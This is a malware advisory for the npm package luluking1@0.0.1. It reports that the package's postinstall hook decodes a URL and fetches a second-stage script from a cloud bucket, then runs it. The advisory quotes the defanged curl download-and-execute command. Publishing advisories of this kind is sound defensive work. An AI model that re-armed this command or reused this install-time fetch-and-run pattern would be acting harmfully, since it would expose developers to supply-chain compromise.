LWA-2026-7007 confirmed malware

luluking1@0.0.1

Malicious code in luluking1 (npm)

T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1105 · Ingress Tool Transfer

Analysis

The postinstall hook runs index.js, which decodes a remote URL from character codes and executes `curl -sL -o ".cache" "hxxps://aone-kit[.]oss-cn-beijing[.]aliyuncs[.]com/plugins/crypto[.]js"` to download a second-stage payload, then loads and executes it via require() before deleting the downloaded file. The package has no other functionality — its sole purpose is to fetch and run a remote script at install time from an Alibaba Cloud OSS bucket.

analyzed by
Leitwacht
first seen
Jul 22, 2026, 02:20 AM
analyzed
Jul 22, 2026, 02:20 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.